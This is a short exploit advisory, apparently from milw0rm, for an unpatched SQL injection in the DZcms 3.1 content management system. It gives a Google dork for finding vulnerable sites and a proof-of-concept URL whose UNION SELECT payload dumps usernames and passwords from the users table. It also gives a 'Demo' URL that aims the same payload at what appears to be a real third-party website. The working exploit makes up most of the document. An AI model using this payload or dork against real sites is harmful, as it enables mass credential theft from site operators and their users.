18 lines
No EOL
627 B
Text
18 lines
No EOL
627 B
Text
Application: DZcms v.3.1
|
|
Vendor Name: CyDezines
|
|
Vendor Url: http://www.cydezines.com
|
|
Bug Type: dzCMS SQL Injection Vulnerability
|
|
Exploitation: Remote
|
|
Severity: High
|
|
Solution Status: Unpatched
|
|
Google Dork: "Powered by DZcms"
|
|
|
|
POC: http://www.demo.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*
|
|
|
|
Demo:
|
|
http://www.psgdynamicsystems.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*
|
|
|
|
Credits: Glafkos Charalambous
|
|
glafkos [at] astalavista [dot] com
|
|
|
|
# milw0rm.com [2009-01-11] |